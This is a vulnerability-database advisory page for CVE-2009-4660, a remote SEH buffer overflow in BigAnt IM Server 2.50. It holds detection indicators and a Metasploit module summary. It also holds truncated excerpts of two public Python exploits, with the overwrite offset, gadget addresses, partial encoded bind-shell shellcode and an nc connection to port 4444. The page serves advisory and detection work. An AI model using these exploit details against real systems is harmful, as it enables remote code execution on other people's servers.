CVE-2009-4660
published 2010-03-03CVE-2009-4660: Stack-based buffer overflow in the AntServer Module (AntServer.exe) in BigAnt IM Server 2.50 allows remote attackers to execute arbitrary code via a long GET…
PriorityP275critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
62.12%
99.1th percentile
Stack-based buffer overflow in the AntServer Module (AntServer.exe) in BigAnt IM Server 2.50 allows remote attackers to execute arbitrary code via a long GET request to TCP port 6660.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bigantsoft | bigant_messenger | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit triggers a stack-based SEH overwrite via an oversized HTTP GET request; the SEH record is overwritten at offset 989 bytes into the payload. ↗
- →The exploit uses a short jump (\xeb\x06\x90\x90) as the next-SEH pointer to redirect execution into the NOP sled and shellcode. ↗
- →The SEH overwrite address in exploit 9673 points to a pop/pop/ret gadget inside vbajet32.dll (0x0f9a196a). ↗
- →The universal variant (exploit 9690) uses a pop/pop/ret gadget from MFC42.DLL (0x6bc420c3) for the SEH overwrite. ↗
- →The shellcode payload is encoded with x86/alpha_mixed encoder with EXITFUNC=seh and opens a bind shell on TCP port 4444; detect anomalously large GET requests to port 6660 containing high-entropy alpha-mixed encoded data. ↗
- →AntServer service does not restart after exploitation; a single successful exploit attempt permanently kills the service, which can serve as a post-exploitation indicator. ↗
- ·Exploit was tested specifically against Windows XP SP3 (exploit 9673) and Windows XP SP2 (exploit 9690); SEH gadget addresses (vbajet32.dll, MFC42.DLL) are OS/patch-level specific and may not apply to other environments. ↗
- ·The Metasploit module targets BigAnt Server version 2.52 via the USV command, which is a related but distinct attack surface from the GET-based overflow in version 2.50. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
exploitdb·2009-09-15
CVE-2009-4660 BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s \n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder:
Exploit-DB
BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)
exploitdb·2009-09-15
CVE-2009-4660 BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)
BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)
---
#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s \n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x
Metasploit
BigAnt Server 2.52 USV Buffer Overflow
metasploit
BigAnt Server 2.52 USV Buffer Overflow
BigAnt Server 2.52 USV Buffer Overflow
This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.52. NOTE: The AntServer service does not restart, you only get one shot.
No writeups or analysis indexed.
http://secunia.com/advisories/36704http://www.attrition.org/pipermail/vim/2009-September/002271.htmlhttp://www.exploit-db.com/exploits/9673http://www.exploit-db.com/exploits/9690http://www.securityfocus.com/bid/36407http://www.vupen.com/english/advisories/2009/2679http://secunia.com/advisories/36704http://www.attrition.org/pipermail/vim/2009-September/002271.htmlhttp://www.exploit-db.com/exploits/9673http://www.exploit-db.com/exploits/9690http://www.securityfocus.com/bid/36407http://www.vupen.com/english/advisories/2009/2679
2010-03-03
Published